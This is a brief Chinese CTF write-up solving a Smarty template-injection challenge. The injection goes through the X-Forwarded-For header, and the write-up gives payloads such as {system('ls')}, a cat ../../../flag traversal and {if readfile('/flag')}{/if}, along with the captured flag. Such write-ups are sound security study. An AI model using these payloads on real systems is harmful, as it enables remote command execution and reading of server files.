知识点:1.SSTI(smarty模板)
2.XFF
1.开题:
a.题目标明smarty,这是用php编写的比较著名的模板引擎,猜测很可能和模板注入有关系
b.提示xff
2.利用bp抓包,添加xff并尝试模板注入
很明显存在SSTI
3.改payload={system('ls')}
分别cat没有flag
猜测可能在目录下面
'cat ../../../flag'(前面有几个../需要挨个试一下)
flag{3941b25d-8279-47eb-acf6-6d7b8b6208fe}
ps:smarty模板也可以利用{if}
smarty
中的{if}
标签中可以执行php
语句,{if readfile('/flag')}{/if}